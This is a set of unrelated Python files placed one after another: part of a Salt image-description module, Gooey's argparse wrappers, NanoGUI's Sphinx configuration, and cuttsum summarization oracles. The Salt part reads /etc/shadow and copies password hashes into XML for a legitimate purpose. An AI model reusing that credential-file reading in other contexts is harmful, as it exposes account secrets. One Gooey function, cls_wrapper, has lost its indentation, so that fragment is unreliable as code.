                    login, passwd = sh_line.split(":")[:2]
                    if passwd and passwd[0] not in '!*':
                        shadow[login] = {'p': passwd}

        with open('/etc/passwd') as passwd_file:
            for ps_line in passwd_file.read().split(os.linesep):
                if ps_line.strip():
                    ps_line = ps_line.strip().split(':')
                    if ps_line[0] in shadow:
                        shadow[ps_line[0]]['h'] = ps_line[5]   # home dir
                        shadow[ps_line[0]]['s'] = ps_line[6]   # shell
                        shadow[ps_line[0]]['g'] = self._get_user_groups(ps_line[0])

        users_groups = []
        users_node = etree.SubElement(node, 'users')
        for u_name, u_data in shadow.items():
            user_node = etree.SubElement(users_node, 'user')
            user_node.set('password', u_data['p'])  # hash, not plaintext
            user_node.set('home', u_data['h'])
            user_node.set('name', u_name)
            users_groups.extend(u_data['g'])
        users_node.set('group', ','.join(users_groups))

        return users_node

    def _set_repositories(self, node):
        '''
        Create repositories.

        :param node: parent XML node
        :return: None
        '''
        priority = 99
        for repo_id, repo_data in self._data.software.get('repositories', {}).items():
            if isinstance(repo_data, list):
                repo_data = repo_data[0]
            if repo_data.get('enabled') or not repo_data.get('disabled'):  # RPM and Debian, respectively
                uri = repo_data.get('baseurl', repo_data.get('uri'))
                if not uri:
                    continue
                repo = etree.SubElement(node, 'repository')
                if self.__grains__.get('os_family') in ('Kali', 'Debian'):
                    repo.set('alias', repo_id)
                    repo.set('distribution', repo_data['dist'])
                else:
                    repo.set('alias', repo_data['alias'])
                    if self.__grains__.get('os_family', '') == 'Suse':
                        repo.set('type', 'yast2')  # TODO: Check for options!
                    repo.set('priority', str(priority))
                source = etree.SubElement(repo, 'source')
                source.set('path', uri)  # RPM and Debian, respectively
                priority -= 1

    def _set_packages(self, node):
        '''
        Set packages and collections.

        :param node: parent XML node
        :return: the created <packages> element
        '''
        pkgs = etree.SubElement(node, 'packages')
        # Only the package names are emitted; versions are irrelevant here.
        for pkg_name in sorted(self._data.software.get('packages', {})):
            pkg = etree.SubElement(pkgs, 'package')
            pkg.set('name', pkg_name)

        # Add collections (SUSE)
        if self.__grains__.get('os_family', '') == 'Suse':
            for ptn_id, ptn_data in self._data.software.get('patterns', {}).items():
                if ptn_data.get('installed'):
                    ptn = etree.SubElement(pkgs, 'namedCollection')
                    ptn.set('name', ptn_id)

        return pkgs

    def _set_description(self, node):
        '''
        Create a system description.

        :param node: parent XML node
        :return: the created <description> element
        '''
        hostname = socket.getfqdn() or platform.node()

        descr = etree.SubElement(node, 'description')
        author = etree.SubElement(descr, 'author')
        author.text = "salt.modules.node on {0}".format(hostname)
        contact = etree.SubElement(descr, 'contact')
        contact.text = 'root@{0}'.format(hostname)
        specs = etree.SubElement(descr, 'specification')
        specs.text = 'Rebuild of {0}, based on Salt inspection.'.format(hostname)

        return descr

    def _create_doc(self):
        '''
        Create the root <image> document element.

        :return: root element
        '''
        root = etree.Element('image')
        root.set('schemaversion', '6.3')
        root.set('name', self.name)

        return root
| |
from argparse import ArgumentParser, _SubParsersAction
from argparse import _MutuallyExclusiveGroup, _ArgumentGroup
class GooeySubParser(_SubParsersAction):
    """Pass-through subclass of argparse's private ``_SubParsersAction``.

    Adds no behavior; presumably exists so Gooey can distinguish
    sub-parser actions it created — confirm against callers.
    """
    def __init__(self, *args, **kwargs):
        super(GooeySubParser, self).__init__(*args, **kwargs)
# TODO: figure out how to correctly dispatch all of these
# so that the individual wrappers aren't needed
class GooeyArgumentGroup(_ArgumentGroup):
    """Argument group that records Gooey widget/option metadata.

    The Gooey-only keyword arguments (``widget``, ``metavar``,
    ``gooey_options``) are stripped before delegating to argparse, then
    stored in the shared ``widgets``/``options`` registries keyed by the
    new action's ``dest``.
    """

    def __init__(self, parser, widgets, options, *args, **kwargs):
        self.parser = parser
        self.widgets = widgets
        self.options = options
        super(GooeyArgumentGroup, self).__init__(self.parser, *args, **kwargs)

    def add_argument(self, *args, **kwargs):
        # Strip the Gooey-only kwargs so argparse never sees them.
        widget = kwargs.pop('widget', None)
        metavar = kwargs.pop('metavar', None)
        gooey_options = kwargs.pop('gooey_options', None)

        action = super(GooeyArgumentGroup, self).add_argument(*args, **kwargs)

        # The freshly registered action is the last one on the parser.
        added = self.parser._actions[-1]
        added.metavar = metavar
        self.widgets[added.dest] = widget
        self.options[added.dest] = gooey_options
        return action

    def add_argument_group(self, *args, **kwargs):
        gooey_options = kwargs.pop('gooey_options', {})
        group = GooeyArgumentGroup(
            self.parser, self.widgets, self.options, *args, **kwargs)
        group.gooey_options = gooey_options
        self._action_groups.append(group)
        return group

    def add_mutually_exclusive_group(self, *args, **kwargs):
        gooey_options = kwargs.pop('gooey_options', {})
        group = GooeyMutuallyExclusiveGroup(
            self, self.parser, self.widgets, self.options, *args, **kwargs)
        group.gooey_options = gooey_options
        self.parser._mutually_exclusive_groups.append(group)
        return group
class GooeyMutuallyExclusiveGroup(_MutuallyExclusiveGroup):
    """Mutually-exclusive group that records Gooey widget/option metadata."""

    def __init__(self, container, parser, widgets, options, *args, **kwargs):
        self.parser = parser
        self.widgets = widgets
        self.options = options
        super(GooeyMutuallyExclusiveGroup, self).__init__(
            container, *args, **kwargs)

    def add_argument(self, *args, **kwargs):
        # Remove the Gooey-only kwargs before argparse validates them.
        widget = kwargs.pop('widget', None)
        metavar = kwargs.pop('metavar', None)
        gooey_options = kwargs.pop('gooey_options', None)

        super(GooeyMutuallyExclusiveGroup, self).add_argument(*args, **kwargs)

        added = self.parser._actions[-1]
        added.metavar = metavar
        self.widgets[added.dest] = widget
        self.options[added.dest] = gooey_options
class MyArgumentParser(ArgumentParser):
    """ArgumentParser variant that collects error messages instead of
    exiting (argparse's default ``error`` prints usage and calls
    ``sys.exit(2)``)."""
    def __init__(self, **kwargs):
        # Messages passed to error(), in order of occurrence.
        self._errors = []
        super(MyArgumentParser, self).__init__(**kwargs)

    def error(self, message):
        # Override: record the message; deliberately no print / exit.
        self._errors.append(message)
def lift_relevant(**kwargs):
    """
    Lifts the user's (likely) partial function into
    total one of type `String -> Either Error a`

    Returns a copy of ``kwargs`` whose ``type`` callable has been
    wrapped by ``lift``; if the target Action rejects any of the
    arguments, the original ``kwargs`` are returned unchanged.
    """
    try:
        # Not all Parser Actions accept a type function. Rather
        # than track what allows what explicitly, we just try to
        # pass the `type` var to constructor. If it doesn't
        # explode, then we're good and we use the lifted type. Otherwise
        # we use the original kwargs
        probe_parser = ArgumentParser()
        lifted_kwargs = {**kwargs, 'type': lift(kwargs.get('type', identity))}
        probe_parser.add_argument('-a', **lifted_kwargs)
        return lifted_kwargs
    except TypeError:
        # Constructor rejected the lifted kwargs; fall back untouched.
        # (The exception itself carries no useful info here, so it is
        # not bound.)
        return kwargs
def cls_wrapper(cls, **options):
def inner(*args, **kwargs):
class ActionWrapper(cls):
def __call__(self, p, namespace, values, option_string, **qkwargs):
# print('hello from', options, namespace, values, option_string, qkwargs)
super(ActionWrapper, self).__call__(p, namespace, values, option_string, **qkwargs)
return ActionWrapper(*args, **kwargs)
return inner
class GooeyParser(object):
    """Facade over ``argparse.ArgumentParser`` that additionally records
    per-argument Gooey metadata (``widget`` and ``gooey_options``),
    keyed by each action's ``dest``.

    Unknown attribute reads/writes fall through to the wrapped parser
    via ``__getattr__``/``__setattr__`` at the bottom of the class.
    """
    def __init__(self, **kwargs):
        on_success = kwargs.pop('on_success', None)
        on_error = kwargs.pop('on_error', None)
        # Assign through __dict__ to bypass the __setattr__ override,
        # which would otherwise forward this very assignment to the
        # (not yet existing) wrapped parser.
        self.__dict__['parser'] = ArgumentParser(**kwargs)
        # NOTE: these writes go through __setattr__ and therefore land
        # on the wrapped parser object; reads find them via __getattr__.
        self.widgets = {}
        self.options = {}
        self.on_gooey_success = on_success
        self.on_gooey_error = on_error
        if 'parents' in kwargs:
            # Inherit widget/options metadata from GooeyParser parents.
            for parent in kwargs['parents']:
                if isinstance(parent, self.__class__):
                    self.widgets.update(parent.widgets)
                    self.options.update(parent.options)

    @property
    def _mutually_exclusive_groups(self):
        return self.parser._mutually_exclusive_groups

    @property
    def _actions(self):
        return self.parser._actions

    @property
    def description(self):
        return self.parser.description

    def add_argument(self, *args, **kwargs):
        """Register an argument, siphoning off the Gooey-only kwargs."""
        widget = kwargs.pop('widget', None)
        metavar = kwargs.pop('metavar', None)
        options = kwargs.pop('gooey_options', None)

        # TODO: move this to the control module. No need to do it
        # at creation time.
        # lifted_kwargs = lift_relevant(**kwargs)
        #
        # action_cls = self.parser._pop_action_class(kwargs)
        # enhanced_action = cls_wrapper(action_cls, **(options if options else {}))
        #
        # action = self.parser.add_argument(*args, **{**lifted_kwargs, 'action': enhanced_action})
        action = self.parser.add_argument(*args, **kwargs)
        self.parser._actions[-1].metavar = metavar

        action_dest = self.parser._actions[-1].dest
        # Only record metadata if nothing meaningful was inherited from
        # a parent parser for this dest.
        if action_dest not in self.widgets or self.widgets[action_dest] is None:
            self.widgets[action_dest] = widget

        if action_dest not in self.options or self.options[action_dest] is None:
            self.options[self.parser._actions[-1].dest] = options

        self._validate_constraints(
            self.parser._actions[-1],
            widget,
            options or {},
            **kwargs
        )
        return action

    def add_mutually_exclusive_group(self, *args, **kwargs):
        options = kwargs.pop('gooey_options', {})
        group = GooeyMutuallyExclusiveGroup(self, self.parser, self.widgets, self.options, *args, **kwargs)
        group.gooey_options = options
        self.parser._mutually_exclusive_groups.append(group)
        return group

    def add_argument_group(self, *args, **kwargs):
        options = kwargs.pop('gooey_options', {})
        group = GooeyArgumentGroup(self.parser, self.widgets, self.options, *args, **kwargs)
        group.gooey_options = options
        self.parser._action_groups.append(group)
        return group

    def parse_args(self, args=None, namespace=None):
        return self.parser.parse_args(args, namespace)

    def add_subparsers(self, **kwargs):
        # Mirrors argparse.ArgumentParser.add_subparsers so the group is
        # built via this class and Gooey metadata keeps flowing.
        if self._subparsers is not None:
            # NOTE(review): '_' (gettext) is not defined in this module;
            # this error path would raise NameError — verify upstream.
            self.error(_('cannot have multiple subparser arguments'))

        # add the parser class to the arguments if it's not present
        kwargs.setdefault('parser_class', type(self))

        if 'title' in kwargs or 'description' in kwargs:
            title = kwargs.pop('title', 'subcommands')
            description = kwargs.pop('description', None)
            self._subparsers = self.add_argument_group(title, description)
        else:
            self._subparsers = self._positionals

        # prog defaults to the usage message of this parser, skipping
        # optional arguments and with no "usage:" prefix
        if kwargs.get('prog') is None:
            formatter = self._get_formatter()
            positionals = self._get_positional_actions()
            groups = self._mutually_exclusive_groups
            formatter.add_usage(self.usage, positionals, groups, '')
            kwargs['prog'] = formatter.format_help().strip()

        # create the parsers action and add it to the positionals list
        parsers_class = self._pop_action_class(kwargs, 'parsers')
        action = parsers_class(option_strings=[], **kwargs)
        self._subparsers._add_action(action)

        # return the created parsers action
        return action

    def _validate_constraints(self, parser_action, widget, options, **kwargs):
        # Deferred import: gooey is only needed once arguments are added.
        from gooey.python_bindings import constraints
        constraints.assert_listbox_constraints(widget, **kwargs)
        constraints.assert_visibility_requirements(parser_action, options)

    def __getattr__(self, item):
        # Fallback: delegate unknown attribute reads to the wrapped parser.
        return getattr(self.parser, item)

    def __setattr__(self, key, value):
        # ALL attribute writes land on the wrapped parser (see __init__).
        return setattr(self.parser, key, value)
| |
# -*- coding: utf-8 -*-
#
# NanoGUI documentation build configuration file, created by
# sphinx-quickstart on Mon Aug 22 20:05:54 2016.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
import textwrap
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('.'))

# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.ifconfig',
    'breathe'
]

# Breathe configuration: point the project at the Doxygen XML that
# generateDoxygenXML() produces at build time (see setup() below).
breathe_projects = { "NanoGUI": "./doxyoutput/xml" }
breathe_default_project = "NanoGUI"

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'NanoGUI'
copyright = u'2016, Wenzel Jakob'
author = u'Wenzel Jakob'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1.0'
# The full version, including alpha/beta/rc tags.
release = '0.1.0'

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']

# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []

# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False

# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False

# Tell sphinx what the primary language being documented is.
primary_domain = 'cpp'

# Tell sphinx what the pygments highlight language should be.
highlight_language = 'cpp'
# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.

# on_rtd is whether we are on readthedocs.org, this line of code grabbed from docs.readthedocs.org
# (Read the Docs injects its own theme, so sphinx_rtd_theme is only
# needed for local builds.)
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd:  # only import and set the theme if we're building docs locally
    import sphinx_rtd_theme
    html_theme = 'sphinx_rtd_theme'
    html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]

# html_theme = 'alabaster'

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '../resources/icons/icon6.ico'

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']

# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []

# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'

# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True

# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}

# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}

# If false, no module index is generated.
#html_domain_indices = True

# If false, no index is generated.
#html_use_index = True

# If true, the index is split into individual pages for each letter.
#html_split_index = False

# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True

# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True

# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True

# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''

# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None

# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
#   'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
#   'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'

# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}

# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'

# Output file base name for HTML help builder.
htmlhelp_basename = 'NanoGUIdoc'

# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',

# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',

# Additional stuff for the LaTeX preamble.
#'preamble': '',

# Latex figure (float) alignment
#'figure_align': 'htbp',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'NanoGUI.tex', u'NanoGUI Documentation',
     u'Wenzel Jakob', 'manual'),
]

# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None

# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False

# If true, show page references after internal links.
#latex_show_pagerefs = False

# If true, show URL addresses after external links.
#latex_show_urls = False

# Documents to append as an appendix to all manuals.
#latex_appendices = []

# If false, no module index is generated.
#latex_domain_indices = True

# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'nanogui', u'NanoGUI Documentation',
     [author], 1)
]

# If true, show URL addresses after external links.
#man_show_urls = False

# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'NanoGUI', u'NanoGUI Documentation',
     author, 'NanoGUI', 'One line description of project.',
     'Miscellaneous'),
]

# Documents to append as an appendix to all manuals.
#texinfo_appendices = []

# If false, no module index is generated.
#texinfo_domain_indices = True

# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'

# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
def generateDoxygenXML(stripPath):
    '''
    Generates the doxygen xml files used by breathe and exhale.

    Approach modified from:

    - https://github.com/fmtlib/fmt/blob/master/doc/build.py

    :param stripPath:
        The value you are sending to exhale.generate via the
        key 'doxygenStripFromPath'. Usually, should be '..'.

    :raises Exception:
        If the ``doxygen`` process cannot be launched or exits non-zero.
    '''
    from subprocess import PIPE, Popen
    try:
        doxygen_cmd = ["doxygen", "-"]  # "-" tells Doxygen to read configs from stdin
        doxygen_proc = Popen(doxygen_cmd, stdin=PIPE)
        doxygen_input = r'''
        # Make this the same as what you tell exhale.
        OUTPUT_DIRECTORY = doxyoutput
        # If you need this to be YES, exhale will probably break.
        CREATE_SUBDIRS = NO
        # So that only include/ and subdirectories appear.
        FULL_PATH_NAMES = YES
        STRIP_FROM_PATH = "%s/"
        # Tell Doxygen where the source code is (yours may be different).
        INPUT = ../include
        # Nested folders will be ignored without this. You may not need it.
        RECURSIVE = YES
        # Set to YES if you are debugging or want to compare.
        GENERATE_HTML = NO
        # Unless you want it?
        GENERATE_LATEX = NO
        # Both breathe and exhale need the xml.
        GENERATE_XML = YES
        # Set to NO if you do not want the Doxygen program listing included.
        XML_PROGRAMLISTING = YES
        # Allow for rst directives and advanced functions (e.g. grid tables)
        ALIASES = "rst=\verbatim embed:rst:leading-asterisk"
        ALIASES += "endrst=\endverbatim"
        # We definitely need the preprocessor for this project.
        ENABLE_PREPROCESSING = YES
        MACRO_EXPANSION = YES
        EXPAND_ONLY_PREDEF = NO
        SKIP_FUNCTION_MACROS = NO
        PREDEFINED = NAMESPACE_BEGIN(nanogui)="namespace nanogui {"
        PREDEFINED += NAMESPACE_END(nanogui)="}"
        PREDEFINED += NAMESPACE_BEGIN(detail)="namespace detail {"
        PREDEFINED += NAMESPACE_END(detail)="}"
        PREDEFINED += DOXYGEN_SHOULD_SKIP_THIS
        PREDEFINED += DOXYGEN_DOCUMENTATION_BUILD
        PREDEFINED += NANOGUI_EXPORT
        ''' % stripPath
        # In python 3 strings and bytes are no longer interchangeable.
        # Use sys.version_info rather than parsing sys.version: the
        # original check (`sys.version[0] == "3"`) inspected a single
        # character of the human-readable version string, which breaks
        # for any future double-digit major version.
        if sys.version_info[0] >= 3:
            doxygen_input = bytes(doxygen_input, 'ASCII')
        doxygen_proc.communicate(input=doxygen_input)
        # communicate() has already flushed and closed stdin; the
        # explicit stdin.close() that used to follow was redundant.
        if doxygen_proc.wait() != 0:
            raise RuntimeError("Non-zero return code from 'doxygen'...")
    except Exception as e:
        # Re-wrap everything (including the RuntimeError above) so the
        # Sphinx build fails with a single clear message, preserving the
        # cause text.
        raise Exception("Unable to execute 'doxygen': {}".format(e))
# setup is called auto-magically for you by Sphinx
def setup(app):
    """Sphinx entry point: run Doxygen, then generate the exhale API tree."""
    # Doxygen must run first so the XML exists for breathe/exhale below.
    stripPath = ".."
    generateDoxygenXML(stripPath)

    # generate description text for the library api
    # (shown beneath the generated "Library API" title)
    libraryDescription = textwrap.dedent('''
        Welcome to the developer reference to NanoGUI. The documentation is actively being
        developed / updated. If you would like to help document any part of the project
        you may be familiar with, please refer to the :ref:`developer_contribution` page.

        .. note::

           Presented below is only the C++ API. If you are using the Python API, the
           contents below are still applicable for understanding what methods are available.
           While the documentation for the C++ API is useful as a reference for
           understanding what a given class does, the Python API does differ. Please refer
           to the more concise :ref:`nanogui_example_2` for comparing the differences
           between the C++ and Python interfaces.
    ''')

    # create the dictionary to send to exhale
    exhaleArgs = {
        "doxygenIndexXMLPath" : "./doxyoutput/xml/index.xml",
        "containmentFolder"   : "./generated_api",
        "rootFileName"        : "library_root.rst",
        "rootFileTitle"       : "Library API",
        "fullToctreeMaxDepth" : 1,
        "createTreeView"      : True,
        "afterTitleDescription" : libraryDescription,
        "doxygenStripFromPath"  : ".."
    }

    # import the exhale module from the current directory and generate the api
    from exhale import generate
    generate(exhaleArgs)
| |
import os
from cuttsum.resources import MultiProcessWorker
from cuttsum.pipeline import ArticlesResource
from cuttsum.misc import si2df
import cuttsum.judgements
import numpy as np
import pandas as pd
import sumpy
class RetrospectiveMonotoneSubmodularOracle(MultiProcessWorker):
    """Oracle summarizer: collects every nugget-bearing sentence from the
    whole event stream, then runs ONE greedy monotone-submodular pass over
    the full collection (retrospective, i.e. not incremental), maximizing
    the number of distinct nuggets covered under a sentence budget."""
    def __init__(self):
        # Output root: $TREC_DATA (default ".") /system-results/<system-name>,
        # created on demand.
        self.dir_ = os.path.join(
            os.getenv(u"TREC_DATA", u"."), "system-results",
            "retrospective-monotone-submodular-oracle-summaries")
        if not os.path.exists(self.dir_):
            os.makedirs(self.dir_)
    def get_path_prefix(self, event, corpus, extractor,
            budget, soft_matching):
        # The path encodes every run parameter so runs with different
        # settings never overwrite each other.
        return os.path.join(self.dir_, extractor, str(budget),
            "soft_match" if soft_matching is True else "no_soft_match",
            corpus.fs_name(), event.fs_name())
    def get_job_units(self, event, corpus, **kwargs):
        # This worker has a single unit of work (unit 0) per event/corpus.
        extractor = kwargs.get("extractor", "gold")
        if extractor == "gold" or extractor == "goose":
            return [0]
        else:
            raise Exception(
                "extractor: {} not implemented!".format(extractor))
    def do_job_unit(self, event, corpus, unit, **kwargs):
        """Build the retrospective oracle summary and write two TSVs:
        <prefix>.stats.tsv (coverage statistics, one row) and
        <prefix>.updates.tsv (the selected update sentences)."""
        if unit != 0:
            raise Exception("unit of work out of bounds!")
        extractor = kwargs.get("extractor", "gold")
        soft_match = kwargs.get("soft_match", False)
        budget = kwargs.get("budget", 25)
        output_path_prefix = self.get_path_prefix(
            event, corpus, extractor, budget, soft_match)
        ## Set up summarizer ###
        # This is the monotone submodular objective function (basically
        # nugget coverage).
        def f_of_A(system, A, V_min_A, e, input_df, ndarray_data):
            # Value of summary A = number of distinct nuggets it covers.
            return len(
                set([nugget for nuggets in input_df.ix[A, "nuggets"].tolist()
                    for nugget in nuggets]))
        system = sumpy.system.MonotoneSubmodularBasic(f_of_A=f_of_A, k=budget)
        # Get gold matchings for oracle.
        articles = ArticlesResource()
        all_matches = cuttsum.judgements.get_merged_dataframe()
        matches = all_matches[all_matches["query id"] == event.query_id]
        # Set up soft matching if we are using it.
        if soft_match is True:
            from cuttsum.classifiers import NuggetClassifier
            classify_nuggets = NuggetClassifier().get_classifier(event)
            if event.query_id.startswith("TS13"):
                judged = cuttsum.judgements.get_2013_updates()
                judged = judged[judged["query id"] == event.query_id]
                judged_uids = set(judged["update id"].tolist())
            else:
                # Soft matching is only wired up for the 2013 judgements.
                raise Exception("Bad corpus!")
        # All sentences containing nuggets will go in all_df.
        all_df = []
        # Pull out articles with nuggets.
        for hour, path, si in articles.streamitem_iter(
                event, corpus, extractor):
            # Convert stream item to dataframe and add gold label nuggets.
            # NOTE(review): si2df presumably yields one row per sentence with
            # "update id" / "sent text" columns -- confirm against si2df.
            df = si2df(si, extractor=extractor)
            df["nuggets"] = df["update id"].apply(
                lambda x: set(
                    matches[matches["update id"] == x]["nugget id"].tolist()))
            # Perform soft nugget matching on unjudged sentences.
            if soft_match is True:
                ### NOTE BENE: geting an array of indices to index unjudged
                # sentences so I can force pandas to return a view and not a
                # copy.
                I = np.where(
                    df["update id"].apply(lambda x: x not in judged_uids))[0]
                unjudged = df[
                    df["update id"].apply(lambda x: x not in judged_uids)]
                unjudged_sents = unjudged["sent text"].tolist()
                assert len(unjudged_sents) == I.shape[0]
                df.loc[I, "nuggets"] = classify_nuggets(unjudged_sents)
            # Add sentences with nuggets to final set for summarzing
            df = df[df["nuggets"].apply(len) > 0]
            all_df.append(df)
        # Collect all dataframes into one and reset index (ALWAYS RESET
        # THE INDEX because pandas hates me.)
        all_df = pd.concat(all_df)
        all_df.reset_index(inplace=True)
        summary = system.summarize(all_df)
        # F(S): distinct nuggets covered by the selected summary sentences.
        F_of_S = len(
            set(n for ns in summary._df["nuggets"].tolist() for n in ns))
        #print "F(S)", F_of_S
        #print "summary nuggets"
        sum_nuggets = list(set(
            n for ns in summary._df["nuggets"].tolist() for n in ns))
        sum_nuggets.sort()
        print sum_nuggets
        # Upper bound: every nugget that appeared anywhere in the stream.
        possible_nuggets = list(set(
            n for ns in all_df["nuggets"].tolist() for n in ns))
        possible_nuggets.sort()
        print possible_nuggets
        print len(possible_nuggets)
        event_nuggets = set(matches["nugget id"].tolist())
        total_nuggets = len(event_nuggets)
        # Timestamp of the last stream item processed (stream ids start
        # with an epoch timestamp).
        timestamp = int(si.stream_id.split("-")[0])
        output_df = pd.DataFrame(
            [{"Cum. F(S)": F_of_S,
              "F(S)": F_of_S,
              "UB no const.": len(possible_nuggets), # total_nuggets,
              "budget": budget,
              "Tot. Updates": len(summary._df),
              "event title": event.fs_name(),
              "timestamp": timestamp,
              "query id": event.query_id},],
            columns=["timestamp", "query id", "event title", "Cum. F(S)",
                     "F(S)", "UB no const.",
                     "Tot. Updates", "budget",])
        parent = os.path.dirname(output_path_prefix)
        if not os.path.exists(parent):
            os.makedirs(parent)
        stats_path = output_path_prefix + ".stats.tsv"
        updates_path = output_path_prefix + ".updates.tsv"
        with open(stats_path, "w") as f:
            output_df.to_csv(f, sep="\t", index=False)
        # Encode to UTF-8 bytes before writing (Python 2 str output).
        summary._df["sent text"] = summary._df["sent text"].apply(
            lambda x: x.encode("utf-8"))
        with open(updates_path, "w") as f:
            summary._df[["timestamp", "update id", "sent text"]].sort(
                ["update id"]).to_csv(f, sep="\t", index=False)
class MonotoneSubmodularOracle(MultiProcessWorker):
    """Streaming variant of the oracle: summarizes document-by-document,
    carrying a cache of already-covered nuggets forward and decrementing
    the remaining sentence budget after each document, until the budget
    is exhausted."""
    def __init__(self):
        # Output root: $TREC_DATA (default ".") /system-results/<system-name>,
        # created on demand.
        self.dir_ = os.path.join(
            os.getenv(u"TREC_DATA", u"."), "system-results",
            "monotone-submodular-oracle-summaries")
        if not os.path.exists(self.dir_):
            os.makedirs(self.dir_)
    def get_path_prefix(self, event, corpus, extractor, budget, soft_matching):
        # The path encodes every run parameter so runs with different
        # settings never overwrite each other.
        return os.path.join(self.dir_, extractor, str(budget),
            "soft_match" if soft_matching is True else "no_soft_match",
            corpus.fs_name(), event.fs_name())
    def get_job_units(self, event, corpus, **kwargs):
        # This worker has a single unit of work (unit 0) per event/corpus.
        extractor = kwargs.get("extractor", "gold")
        if extractor == "gold" or extractor == "goose":
            return [0]
        else:
            raise Exception("extractor: {} not implemented!".format(extractor))
    def do_job_unit(self, event, corpus, unit, **kwargs):
        """Run the streaming oracle and write <prefix>.stats.tsv (one row
        per processed document) and <prefix>.updates.tsv (all selected
        update sentences)."""
        if unit != 0:
            raise Exception("unit of work out of bounds!")
        extractor = kwargs.get("extractor", "gold")
        soft_match = kwargs.get("soft_match", False)
        budget = kwargs.get("budget", 25)
        output_path_prefix = self.get_path_prefix(
            event, corpus, extractor, budget, soft_match)
        ## Set up summarizer ###
        # Objective: number of distinct nuggets covered by summary A.
        def f_of_A(system, A, V_min_A, e, input_df, ndarray_data):
            return len(
                set([nugget for nuggets in input_df.ix[A, "nuggets"].tolist()
                    for nugget in nuggets]))
        system = sumpy.system.MonotoneSubmodularBasic(f_of_A=f_of_A, k=budget)
